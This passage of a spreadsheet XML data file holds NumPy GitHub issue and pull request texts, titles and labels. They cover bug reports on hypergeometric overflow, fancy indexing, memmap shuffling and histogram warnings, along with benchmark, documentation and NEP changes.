following problems impossible to encounter:_x000D_
_x000D_
* Python hangs with these calls (see gh-11443):_x000D_
_x000D_
      np.random.hypergeometric(2**62-1, 2**62-1, 26, size=2)_x000D_
      np.random.hypergeometric(2**62-1, 2**62-1, 11, size=12)_x000D_
_x000D_
* Also reported in gh-11443: the distribution of the variates of_x000D_
_x000D_
      np.random.hypergeometric(ngood, nbad, nsample)_x000D_
_x000D_
  is not correct when nsample &gt;= 10 and ngood + nbad is sufficiently large._x000D_
  I don't have a rigorous bound, but a histogram of the p-values of 1500_x000D_
  runs of a G-test with size=5000000 in each run starts to look suspicious_x000D_
  when ngood + nbad is approximately `2**37`.  When the sum is greater than_x000D_
  `2**38`, the distribution is clearly wrong, and, as reported in the pull_x000D_
  request gh-9834, the following call returns all zeros:_x000D_
_x000D_
      np.random.hypergeometric(2**55, 2**55, 10, size=20)_x000D_
_x000D_
* The code does not check for integer overflow of ngood + nbad, so the_x000D_
  following call_x000D_
_x000D_
      np.random.hypergeometric(2**62, 2**62, 1)_x000D_
_x000D_
  on a system where the default integer is 64 bit results in_x000D_
  `ValueError: ngood + nbad &lt; nsample`._x000D_
_x000D_
By restricting the two arguments to be less than `2**30`, the values are_x000D_
well within the space of inputs for which I have no evidence of the_x000D_
function generating an incorrect distribution, and the overflow problem_x000D_
is avoided for both 32-bit and 64-bit systems._x000D_
_x000D_
I replaced the test for `hypergeometric(2**40 - 2, 2**40 - 2, 2**40 - 2) &gt; 0`_x000D_
with `hypergeometric(2**30 - 1, 2**30 - 1, 2**30 - 1) &gt; 0`.  The test was a_x000D_
regression test for a bug in which the function would enter an infinite_x000D_
loop when the arguments were sufficiently large.  The regression test for_x000D_
the fix included the call `hypergeometric(2**40 - 2, 2**40 - 2, 2**40 - 2)`_x000D_
on systems with 64 bit integers.  This call is now disallowed, so I add a_x000D_
call with the maximum allowed values of ngood and nbad.</t>
  </si>
  <si>
    <t>BUG: random: Avoid bad behavior of hypergeometric with very large arguments.</t>
  </si>
  <si>
    <t>Builds upon gh-11473. Once that one is merged, toggle the base branch of this PR to see the updated diff_x000D_
_x000D_
This results in a more reasonable import sequence.</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: Move add_newdocs into core, since it only adds docs to those pieces</t>
  </si>
  <si>
    <t>pytesttester is used by every single subpackage, so making it depend on np.testing just creates cyclic dependencies that can lead to circular imports_x000D_
_x000D_
Importantly, this breaks a cyclic dependency between `np.lib` and `np.core`_x000D_
_x000D_
Relates to #11457</t>
  </si>
  <si>
    <t>MAINT: Move pytesttester outside of np.testing, to avoid creating unnecessary import dependencies</t>
  </si>
  <si>
    <t>Currently, if you include a NEP number in the title of a NEP, it gets rendered twice in the index._x000D_
_x000D_
This is just a minor annoyance I noticed while writing a few NEPs recently.</t>
  </si>
  <si>
    <t>DOC: include NEP number on each NEP page</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: NEP']</t>
  </si>
  <si>
    <t>From the header comment in add_newdocs, it is only intended for C modules._x000D_
_x000D_
This also fixes `help(np.mgrid)`, which previously only showed the help for `nd_grid`</t>
  </si>
  <si>
    <t>MAINT: Remove python-side docstrings from add_newdocs.</t>
  </si>
  <si>
    <t>Without this, my powershell terminal would block on the build completing, even after a ctrl +C - worse, half of my keypresses would be intercepted by the child process._x000D_
_x000D_
This already matches the logic in the log-less case</t>
  </si>
  <si>
    <t>BLD: Don't leave the build task running if runtests.py is interrupted</t>
  </si>
  <si>
    <t>Reading via fancy indexing works fine in this example:_x000D_
```python_x000D_
a = np.arange(6)_x000D_
idx = np.arange(6).reshape(2, 1, 3)[:, :, 0]_x000D_
print(a[idx])_x000D_
[[0]_x000D_
 [3]]_x000D_
```_x000D_
_x000D_
However, writing with the same index modifies the wrong elements:_x000D_
```python_x000D_
a[idx] = -1_x000D_
print(a)_x000D_
[-1 -1  2  3  4  5]_x000D_
```_x000D_
_x000D_
What is even stranger is that the issue disappears if you first copy the index:_x000D_
```python_x000D_
a = np.arange(6)_x000D_
a[idx.copy()] = -1_x000D_
print(a)_x000D_
[-1  1  2 -1  4  5]_x000D_
```_x000D_
_x000D_
This also seems to be related to the index shape because the following works as expected:_x000D_
```python_x000D_
a = np.arange(6)_x000D_
a[np.arange(6).reshape(2, 3)[:, 0]] = -1_x000D_
print(a)_x000D_
[-1  1  2 -1  4  5]_x000D_
```</t>
  </si>
  <si>
    <t>BUG: fancy indexing assignment with strided np.intp writes into wrong positions</t>
  </si>
  <si>
    <t xml:space="preserve">I discussed this a bit with @mattip, but I'm curious what others think about the idea of using CircleCI to make sure that any given PR doesn't break (cause an error during) the running of the `asv` suite._x000D_
_x000D_
There's no suggestion that the results of this would be reliable from a performance regression standpoint (nor stored as an artifact) -- it is just intended as a "prevent errors in the asv suite" check. Looks like ~5 minutes or so for the full NumPy suite, if not less, when done in "quick" mode where a given benchmark just runs once._x000D_
_x000D_
As noted in the comments, I'm not entirely sure how to do this for a given PR elegantly w.r.t overriding some of the settings in `asv.conf.json`; I suppose an ugly solution would be to pull out PR branch name and so on from CircleCI &amp; then programmatically alter the contents of asv.conf.json before the test, but perhaps it is indeed possible to use the command line to override most / all of the directives in the file (I've not had success with altering things like the branch name / env type from command line though)._x000D_
_x000D_
The best attempt I've seen so far for this kind of thing [is an open SciPy PR](https://github.com/scipy/scipy/pull/8779/files) that appears to merge the PR branch into master &amp; write a custom JSON config file as needed. There doesn't seem to be too much resistance to the idea there--just have to think carefully about doing it cleanly it seems._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>[WIP] BLD / BENCH: draft changes for quick asv run in circle ci</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: benchmarks']</t>
  </si>
  <si>
    <t>This converts digitize to a pure-python function that falls back on searchsorted._x000D_
_x000D_
Performance doesn't really matter here anyway - if you care about performance, then you should just call searchsorted directly, rather than checking the order of the bins._x000D_
_x000D_
Partially fixes gh-11022</t>
  </si>
  <si>
    <t>BUG: Don't convert inputs to `np.float64` in digitize</t>
  </si>
  <si>
    <t>Follow up to gh-11453_x000D_
_x000D_
Changes output like_x000D_
_x000D_
    ((array([0., 1.]),), {'dtype': None, 'out': array(0.), 'axis': 0})_x000D_
_x000D_
To_x000D_
_x000D_
    (array([0., 1.]), dtype=None, out=array(0.), axis=0)_x000D_
_x000D_
Probably.</t>
  </si>
  <si>
    <t>MAINT: Produce a more readable repr of argument packs in benchmark</t>
  </si>
  <si>
    <t>By myself and @shoyer
@shoyer: I did rework a few sections here along with converting to
ReST -- can you take a look to make sure you still like it? I'll let
you do the merge :-)</t>
  </si>
  <si>
    <t>Add NEP 22, a high level overview for the duck array work</t>
  </si>
  <si>
    <t>MAINT: Add discussion link to NEP 15</t>
  </si>
  <si>
    <t>I don't think there are any substantive changes here, but there seems
to be some confusion, so this expands that section and adds an
example.</t>
  </si>
  <si>
    <t>NEP: Add some text to NEP 0 to clarify how a NEP is accepted</t>
  </si>
  <si>
    <t>Currently, benchmarks are only done on python2 [1]. Shouldn't this be python3? Or at least not only python2?_x000D_
_x000D_
[1] `asv.conf.json` has `"pythons": ["2.7"],`; see_x000D_
https://github.com/numpy/numpy/blob/master/benchmarks/asv.conf.json#L38</t>
  </si>
  <si>
    <t>Use python 3 for benchmarks?</t>
  </si>
  <si>
    <t>['23 - Wish List', 'component: benchmarks']</t>
  </si>
  <si>
    <t>I just ran the brand new `python -X importtime -c "import numpy"`. Turns out that `numpy.testing` takes rougly 29 % (23 ms) of the total import time (80 ms), most of which (62 %, 14 ms) is the `unittest` module (no `nose` in my environment).  In view of #10856, this is only going to get worse -- `pytest` weighs in with about 35 ms on my machine._x000D_
_x000D_
So there's an opportunity for an easy win in import time by making the import of `numpy.testing` lazy. That is, *if* such a change doesn't cause huge amounts of downstream breakage._x000D_
Alternatively, the main culprits could be imported lazily, with a much smaller downstream impact (likely none).</t>
  </si>
  <si>
    <t>numpy.testing accounts for almost 30 % import time</t>
  </si>
  <si>
    <t>['01 - Enhancement', '54 - Needs decision']</t>
  </si>
  <si>
    <t>When using `numpy.fft.rfft` with `mkl_fft` in a `ThreadPoolExecutor` you can run in a segmentation fault._x000D_
_x000D_
**Why is this a cross-post?**_x000D_
Since this issue is related to Anaconda, Numpy and mkl_fft, this issue is posted on all three locations. Currently, it is not quite clear which party should address the issue._x000D_
_x000D_
- [mkl_fft](https://github.com/IntelPython/mkl_fft/issues/11): No response yet._x000D_
- [numpy](https://github.com/numpy/numpy/issues/11456#issuecomment-401385828): Sees issue at mkl_fft but uses a seemingly buggy library (namely mkl_fft)._x000D_
- [anaconda](https://github.com/ContinuumIO/anaconda-issues/issues/9697): No response yet._x000D_
_x000D_
We get the same error when testing this on different infrastructure/ OS:_x000D_
_x000D_
- Scientific Linux 7.2 (Nitrogen)_x000D_
- Ubuntu 16.04.4 LTS_x000D_
- OSX_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor_x000D_
_x000D_
_x000D_
def fun(_):_x000D_
    print(_)_x000D_
    frames = np.random.randint(1000, 2000)_x000D_
    signal = np.ones((2, frames), dtype=np.float64)_x000D_
_x000D_
    _ = np.fft.rfft(signal)_x000D_
_x000D_
    return 1,_x000D_
_x000D_
_x000D_
if __name__ == '__main__':_x000D_
    # print('ProcessPoolExecutor')_x000D_
    # with ProcessPoolExecutor(4) as ex:_x000D_
    #     list(ex.map(fun, range(50)))_x000D_
_x000D_
    print('ThreadPoolExecutor')_x000D_
    with ThreadPoolExecutor(4) as ex:_x000D_
        list(ex.map(fun, range(500)))_x000D_
_x000D_
```_x000D_
Repeating the example code many times yields some kind of traceback, if it did not segfault._x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Sometimes occuring traceback&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "test_script.py", line 35, in &lt;module&gt;_x000D_
    list(ex.map(fun, range(50)))_x000D_
  File "/net/home/pyadmin/conda/lib/python3.6/concurrent/futures/_base.py", line 586, in result_iterator_x000D_
    yield fs.pop().result()_x000D_
  File "/net/home/pyadmin/conda/lib/python3.6/concurrent/futures/_base.py", line 432, in result_x000D_
    return self.__get_result()_x000D_
  File "/net/home/pyadmin/conda/lib/python3.6/concurrent/futures/_base.py", line 384, in __get_result_x000D_
    raise self._exception_x000D_
  File "/net/home/pyadmin/conda/lib/python3.6/concurrent/futures/thread.py", line 56, in run_x000D_
    result = self.fn(*self.args, **self.kwargs)_x000D_
  File "test_script.py", line 11, in fun_x000D_
    _ = np.fft.rfft(signal)_x000D_
  File "/net/home/pyadmin/conda/lib/python3.6/site-packages/mkl_fft/_numpy_fft.py", line 331, in rfft_x000D_
    output = mkl_fft.rfft_numpy(a, n=n, axis=axis)_x000D_
  File "mkl_fft/_pydfti.pyx", line 569, in mkl_fft._pydfti.rfft_numpy_x000D_
  File "mkl_fft/_pydfti.pyx", line 487, in mkl_fft._pydfti._rc_fft1d_impl_x000D_
ValueError: Internal error occurred_x000D_
```_x000D_
_x000D_
&lt;/details&gt;_x000D_
_x000D_
**Not working environment:**_x000D_
_x000D_
Conda installed numpy version: Version: 1.14.3_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Numpy config&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
python -c "import numpy; print(numpy.show_config())"_x000D_
mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/lukas/anaconda3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/lukas/anaconda3/include']_x000D_
blas_mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/lukas/anaconda3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/lukas/anaconda3/include']_x000D_
blas_opt_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/lukas/anaconda3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/lukas/anaconda3/include']_x000D_
lapack_mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/lukas/anaconda3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/lukas/anaconda3/include']_x000D_
lapack_opt_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/lukas/anaconda3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/lukas/anaconda3/include']_x000D_
None_x000D_
```_x000D_
_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;br&gt;_x000D_
_x000D_
**Working Environment:**_x000D_
_x000D_
Pip installed numpy version: 1.14.5_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Numpy config&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
python -c "import numpy; print(numpy.show_config())"_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_3_10_blas_threads_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_3_10_blas_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_blas_threads_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_blas_info:_x000D_
  NOT AVAILABLE_x000D_
blas_opt_info:_x000D_
    extra_compile_args = ['-msse3', '-I/System/Library/Frameworks/vecLib.framework/Headers']_x000D_
    extra_link_args = ['-Wl,-framework', '-Wl,Accelerate']_x000D_
    define_macros = [('NO_ATLAS_INFO', 3), ('HAVE_CBLAS', None)]_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_clapack_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_3_10_threads_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_3_10_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_threads_info:_x000D_
  NOT AVAILABLE_x000D_
atlas_info:_x000D_
  NOT AVAILABLE_x000D_
lapack_opt_info:_x000D_
    extra_compile_args = ['-msse3']_x000D_
    extra_link_args = ['-Wl,-framework', '-Wl,Accelerate']_x000D_
    define_macros = [('NO_ATLAS_INFO', 3), ('HAVE_CBLAS', None)]_x000D_
None_x000D_
```_x000D_
_x000D_
&lt;/details&gt;</t>
  </si>
  <si>
    <t>Segmentation fault with numpy.fft.rfft and MKL and threads</t>
  </si>
  <si>
    <t>I  hope this is the right channel for my question and hope you could help. I tried to install Numpy via Homebrew with this line:_x000D_
_x000D_
&gt; brew tap homebrew/science &amp;&amp; brew install python numpy scipy matplotlib_x000D_
_x000D_
And get the following error:_x000D_
_x000D_
&gt; Error: homebrew/science was deprecated. This tap is now empty as all its formulae were migrated._x000D_
_x000D_
What went wrong here and how could I solve it? Thanks…</t>
  </si>
  <si>
    <t>How to install Numpy on OS 10.13.15 with Homebrew…</t>
  </si>
  <si>
    <t>As requested in https://github.com/numpy/numpy/pull/11351#discussion_r199089191</t>
  </si>
  <si>
    <t>BENCH: add ufunc argument parsing benchmarks.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: benchmarks', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">fixed #9081_x000D_
_x000D_
For regular arrays, we now give a deprecation warning if np.positive cannot handle it; for ndarray subclasses that override __array_ufunc__, we pass on the type error._x000D_
</t>
  </si>
  <si>
    <t>MAINT/DEP: properly implement `ndarray.__pos__`</t>
  </si>
  <si>
    <t>Still a rough draft, needs more community input and internal organization. I would like to get it into the NEP process so we can keep track of discussions and comments</t>
  </si>
  <si>
    <t>WIP, NEP: add roadmap process NEP</t>
  </si>
  <si>
    <t>```np.fromfunction(lambda i, j: 1, (3, 3), dtype=int)``` returns ```1```.</t>
  </si>
  <si>
    <t>DOC: Fix documentation for fromfunction</t>
  </si>
  <si>
    <t xml:space="preserve">OS: Windows 7 SP1_x000D_
NumPy: 1.14.5_x000D_
Python: 3.6.5_x000D_
_x000D_
## Abstract_x000D_
_x000D_
Calling `numpy.random.shuffle` on a memory-mapped structured array introduces repeated elements. The first element in the array appears to be most (only?) affected. Repeated calls to `shuffle` will result in an array that just repeats the first element of the original array._x000D_
_x000D_
## Code Example_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
np.random.seed(1)_x000D_
_x000D_
x = np.array([_x000D_
    ('aa', 1, 1.1),_x000D_
    ('bb', 2, 0.7),_x000D_
    ('cc', 3, 0.5),_x000D_
    ('xy', 4, 0.3),_x000D_
    ('zz', 5, 0.2)_x000D_
], dtype=[_x000D_
    ('col1', '&lt;U2'),_x000D_
    ('col2', '&lt;i4'),_x000D_
    ('col3', '&lt;f4')_x000D_
])_x000D_
_x000D_
fp = np.memmap("test.dat", dtype=x.dtype, mode="w+", shape=x.shape)_x000D_
fp[:] = x_x000D_
print("before shuffle\n", fp)_x000D_
_x000D_
np.random.shuffle(fp)_x000D_
print("after shuffle\n", fp)_x000D_
```_x000D_
_x000D_
before shuffle_x000D_
 [('aa', 1, 1.1) ('bb', 2, 0.7) ('cc', 3, 0.5) ('xy', 4, 0.3) ('zz', 5, 0.2)]_x000D_
_x000D_
after shuffle_x000D_
 [('aa', 1, 1.1) ('bb', 2, 0.7) ('aa', 1, 1.1) ('aa', 1, 1.1) ('xy', 4, 0.3)]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>shuffle on memmap'ed structured array corrupts data</t>
  </si>
  <si>
    <t>Values like NaN and inf would result in wrong interpolated values on_x000D_
exactly matching sampling points. To produce the correct behavior, we_x000D_
add an additional check to avoid interpolation when handling such a_x000D_
point._x000D_
_x000D_
Closes #11439</t>
  </si>
  <si>
    <t>BUG: fix interpolation with inf and NaN present</t>
  </si>
  <si>
    <t>The functions `np.isposinf` and `np.isneginf` fail for arrays with complex values._x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a = np.arange(2) + 1j_x000D_
&gt;&gt;&gt; np.isposinf(a)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/usr/lib/python3/dist-packages/numpy/lib/ufunclike.py", line 34, in func_x000D_
    return f(x, out=out, **kwargs)_x000D_
  File "/usr/lib/python3/dist-packages/numpy/lib/ufunclike.py", line 141, in isposinf_x000D_
    return nx.logical_and(nx.isinf(x), ~nx.signbit(x), out)_x000D_
TypeError: ufunc 'signbit' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule ''safe''_x000D_
&gt;&gt;&gt; np.isneginf(a)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/usr/lib/python3/dist-packages/numpy/lib/ufunclike.py", line 34, in func_x000D_
    return f(x, out=out, **kwargs)_x000D_
  File "/usr/lib/python3/dist-packages/numpy/lib/ufunclike.py", line 202, in isneginf_x000D_
    return nx.logical_and(nx.isinf(x), nx.signbit(x), out)_x000D_
TypeError: ufunc 'signbit' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule ''safe''_x000D_
```_x000D_
I used NumPy 1.14.5 and Python 3.6.</t>
  </si>
  <si>
    <t>BUG: isposinf and isneginf fail for complex values</t>
  </si>
  <si>
    <t>Updating average Docs as per Issue :Return dtype of numpy.average(a, ...) is not always that of its first argument #11290</t>
  </si>
  <si>
    <t>DOC: Document average return type</t>
  </si>
  <si>
    <t>['04 - Documentation', '55 - Needs work', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">The two functions do very similar things, `cblas_matrixproduct` is used in both `PyArray_MatrixProduct2` (which is the actual implementation of `dot`) and in `array_matmul` if `ndim` &lt;=2 and the dtype is fitting. Otherwise `array_matmul` goes through `einsum`, `PyArray_MatrixProduct2` has its own continuation. I worked through the logic to compare the two and found points of code duplication:_x000D_
_x000D_
 stage | `PyArray_MatrixProduct2` | `cblas_matrixproduct`_x000D_
---|---|---_x000D_
 detect non-aligned or non-contiguous data | doesn't care  | uses `PyArray_NewCopy` if non-aligned or non-contiguous_x000D_
 create output array | use new_array_for_sum | refactored lines of code to new_array_for_sum in this PR_x000D_
logic to handle vector-matrix, matrix-matrix, scalar-matrix and visa-versa | uses `PyArray_IterAllButAxis` | `if`  blocks for each case_x000D_
 chooses function for sum-of-loops | uses `out-&gt;dtype-&gt;vdot` | `if` blocks for each of the level 2 BLAS cases, use out-&gt;dtype-&gt;vdot for vector/scalar (which will use level 1 BLAS dot functions)_x000D_
_x000D_
This PR makes the two functions share the output array logic and uses the same semantics for the level 1 BLAS dot functions (scalar-vector)_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Refactor differences between cblas_matrixproduct and PyArray_MatrixProduct2</t>
  </si>
  <si>
    <t>In our [Python API](https://github.com/ni/nimi-python) for accessing measurement hardware we allow the customer to retrieve their measurements in `numpy` arrays in case they want to do additional processing._x000D_
_x000D_
When using `numpy` 1.14.5 or earlier, we are able to load our C DLL with no issue and make the appropriate calls using `ctypes`._x000D_
_x000D_
When using `numpy` 1.15.0rc1, we get an error when `ctypes` tries to load the DLL saying "[WinError 126] The specified module could not be found"._x000D_
_x000D_
I am using `tox` to run tests so it is using `venv` and all I have to do is change the version of `numpy` and it will start working. This means the DLL is in the path as expected and all dependencies are also loadable._x000D_
_x000D_
I have verified that `numpy` is the only installed package whose version is changing._x000D_
_x000D_
I have verified that the path environment variable has the appropriate directory even in the failure case._x000D_
_x000D_
I have verified that this happens on Python 2.7 and 3.6, both 32 bit and 64 bit._x000D_
_x000D_
As far as I know we are using `ctypes` correctly. At this point I don't have any more ideas on what to look at.</t>
  </si>
  <si>
    <t>Going from numpy 1.14.5 to 1.15.0rc1 breaks loading a DLL using ctypes</t>
  </si>
  <si>
    <t>As requested in #11423, a PR to change the status of NEP 20 to accepted.</t>
  </si>
  <si>
    <t>NEP: accept NEP 20 partially (frozen, flexible, but not broadcastable dimensions)</t>
  </si>
  <si>
    <t>Fixes #11426, which was introduced in #11323 and #11352_x000D_
_x000D_
Backported at #11427</t>
  </si>
  <si>
    <t>BUG: Fix incorrect deprecation logic for histogram(normed=...) (master)</t>
  </si>
  <si>
    <t>Fixes #11426, which was introduced in #11323 and #11352 _x000D_
_x000D_
Forward-ported at #11428</t>
  </si>
  <si>
    <t>BUG: Fix incorrect deprecation logic for histogram(normed=...) (1.15.x)</t>
  </si>
  <si>
    <t>As seen in https://travis-ci.org/ejeschke/ginga/jobs/395720074 . The actual code in Ginga calling histogram is:_x000D_
```python_x000D_
# get image histogram_x000D_
hist, bins = numpy.histogram(some_array, hashsize, density=False)_x000D_
```_x000D_
Note that `normed` was not used. However, it caused this warning in Numpy ~~dev~~ prerelease:_x000D_
```python_x000D_
        else:_x000D_
            if normed is not None:_x000D_
                # 2018-06-13, numpy 1.15.0 (this was not noisily deprecated in 1.6)_x000D_
                warnings.warn(_x000D_
                        "Passing normed=False is deprecated, and has no effect. "_x000D_
                        "Consider passing the density argument instead.",_x000D_
&gt;                       DeprecationWarning, stacklevel=2)_x000D_
E               DeprecationWarning: Passing normed=False is deprecated, and has no effect. Consider passing the density argument instead._x000D_
```_x000D_
_x000D_
I think this is caused by #11352 . When `density=False`, it goes into the logic block that forces `normed=False`, which resulted in it going into this logic block in `np.histogram()`:_x000D_
```python_x000D_
else:_x000D_
    if normed is not None:_x000D_
        ..._x000D_
```_x000D_
_x000D_
cc @ejeschke</t>
  </si>
  <si>
    <t>np.histogram erroneously emit warning when density=False</t>
  </si>
  <si>
    <t>Eliminates all mentions of `np.where(cond)`, instead pointing the reader to np.nonzero._x000D_
_x000D_
Also:_x000D_
* changes some example numbers to avoid collisions, making them easier to follow._x000D_
* adds some clearer examples for `where(cond, x, y)`_x000D_
_x000D_
I think it's valuable not to muddle the documentation for these, as it leaves beginners confused about what `where` actually does.</t>
  </si>
  <si>
    <t>DOC: Clear up confusion between np.where(cond) and np.where(cond, x, y)</t>
  </si>
  <si>
    <t xml:space="preserve">part of #8654_x000D_
_x000D_
Revived from over a year ago_x000D_
_x000D_
cc @convexset </t>
  </si>
  <si>
    <t>ENH: Allow use of svd on empty arrays</t>
  </si>
  <si>
    <t>NumPy currently has no `asv` benchmarks for `np.loadtxt`; this PR is an attempt to provide a set of `asv` benchmarks that may be used as a starting point for assessing future performance improvements to `np.loadtxt` handling of CSV files, though parsing of enormous CSV files may obviously be assessed separately from the conventional `asv` suite._x000D_
_x000D_
Many of the benchmarks here are inspired by those used for `pandas.read_csv`, but some modifications were obviously needed given the different capabilities, APIs, etc._x000D_
_x000D_
Sample new benchmark results from running on `HEAD` locally with `asv run -e -b "Loadtxt*"`:_x000D_
_x000D_
(some output snipped for clarity)_x000D_
_x000D_
```_x000D_
· Running 7 total benchmarks (1 commits * 1 environments * 7 benchmarks)           _x000D_
[  0.00%] · For numpy commit hash 464f79eb:                                        _x000D_
[  0.00%] ·· Building for virtualenv-py3.6-six                                     _x000D_
[  0.00%] ·· Benchmarking virtualenv-py3.6-six                                     _x000D_
[ 14.29%] ··· Running ....LoadtxtCSVComments.time_comment_loadtxt_csv         ok  _x000D_
[ 14.29%] ····                                                                     _x000D_
               =========== ============                                            _x000D_
                num_lines                                                          _x000D_
               ----------- ------------                                            _x000D_
                    10       31.9±1μs                                              _x000D_
                   100      32.2±0.8μs                                             _x000D_
                  10000      45.9±1μs                                              _x000D_
                  100000     597±2ms                                               _x000D_
               =========== ============      _x000D_
_x000D_
[ 28.57%] ··· Running bench_io.LoadtxtCSVSkipRows.time_skiprows_csv           ok  _x000D_
[ 28.57%] ····                                                                     _x000D_
               ========== =======                                                  _x000D_
                skiprows                                                           _x000D_
               ---------- -------                                                  _x000D_
                   0       741ms                                                   _x000D_
                  500      718ms                                                   _x000D_
                 10000     681ms                                                   _x000D_
               ========== =======     _x000D_
[ 42.86%] ··· Running ...tCSVStructured.time_loadtxt_csv_struct_dtype    439±5ms_x000D_
[ 57.14%] ··· Running ..._io.LoadtxtCSVdtypes.time_loadtxt_dtypes_csv         ok  _x000D_
[ 57.14%] ····                                                                     _x000D_
               ============ =========== ============                               _x000D_
                  dtype      num_lines                                             _x000D_
               ------------ ----------- ------------                               _x000D_
                 float32         10       29.9±1μs                                 _x000D_
                 float32        100      31.5±0.4μs                                _x000D_
                 float32       10000     49.8±0.8μs                                _x000D_
                 float32       100000    581±0.5ms                                 _x000D_
                 float64         10      30.6±0.3μs                                _x000D_
                 float64        100      30.1±0.2μs                                _x000D_
                 float64       10000     45.3±0.1μs                                _x000D_
                 float64       100000     609±2ms                                  _x000D_
                  int32          10      29.3±0.2μs                                _x000D_
                  int32         100      29.8±0.6μs                                _x000D_
                  int32        10000     45.8±0.4μs                                _x000D_
                  int32        100000    575±0.9ms                                 _x000D_
                  int64          10      30.2±0.5μs                                _x000D_
                  int64         100       31.3±1μs                                 _x000D_
                  int64        10000      51.5±1μs                                 _x000D_
                  int64        100000      746ms                                   _x000D_
                complex128       10      32.0±0.2μs                                _x000D_
                complex128      100      32.1±0.5μs                                _x000D_
                complex128     10000      62.9±3μs                                 _x000D_
                complex128     100000      754ms                                   _x000D_
                   str           10       33.2±1μs                                 _x000D_
                   str          100      32.4±0.6μs                                _x000D_
                   str         10000     47.3±0.6μs                                _x000D_
                   str         100000     574±2ms                                  _x000D_
                  object         10      33.2±0.4μs                                _x000D_
                  object        100      32.4±0.3μs                                _x000D_
                  object       10000     47.0±0.5μs                                _x000D_
                  object       100000     561±1ms                                  _x000D_
               ============ =========== ============ _x000D_
_x000D_
[ 71.43%] ··· Running ...o.LoadtxtReadUint64Integers.time_read_uint64         ok_x000D_
[ 71.43%] ····                                                                  _x000D_
               ======= ============                                             _x000D_
                 size                                                           _x000D_
               ------- ------------                                             _x000D_
                 550     29.7±1μs                                               _x000D_
                 1000   29.7±0.3μs                                              _x000D_
                10000   36.2±0.6μs                                              _x000D_
               ======= ============                                             _x000D_
                                                                                _x000D_
[ 71.43%] ·····         _x000D_
_x000D_
[ 85.71%] ··· Running ...adUint64Integers.time_read_uint64_neg_values         ok_x000D_
[ 85.71%] ····                                                                  _x000D_
               ======= ============                                             _x000D_
                 size                                                           _x000D_
               ------- ------------                                             _x000D_
                 550    30.6±0.4μs                                              _x000D_
                 1000   28.8±0.5μs                                              _x000D_
                10000   35.5±0.2μs                                              _x000D_
               ======= ============         _x000D_
[100.00%] ··· Running ...o.LoadtxtUseColsCSV.time_loadtxt_usecols_csv         ok_x000D_
[100.00%] ····                                                                  _x000D_
               ============== ============                                      _x000D_
                  usecols                                                       _x000D_
               -------------- ------------                                      _x000D_
                     2         35.9±0.4μs                                       _x000D_
                   [1, 3]      36.8±0.2μs                                       _x000D_
                [1, 3, 5, 7]    40.9±1μs                                        _x000D_
               ============== ============     _x000D_
```</t>
  </si>
  <si>
    <t>BENCH: Add benchmarks for np.loadtxt reading from CSV format files</t>
  </si>
  <si>
    <t>My focus here has been on clarifying the motivation for these changes,_x000D_
and clearly defining indexing terminology. I've also made the proposal_x000D_
a bit more definitive about what changes *should* be made, and have_x000D_
added myself as a co-author.</t>
  </si>
  <si>
    <t>DOC: major revision of NEP 21, advanced indexing</t>
  </si>
  <si>
    <t xml:space="preserve">In the documentation of  `numpy.empty(shape, dtype=float, order='C')`  _x000D_
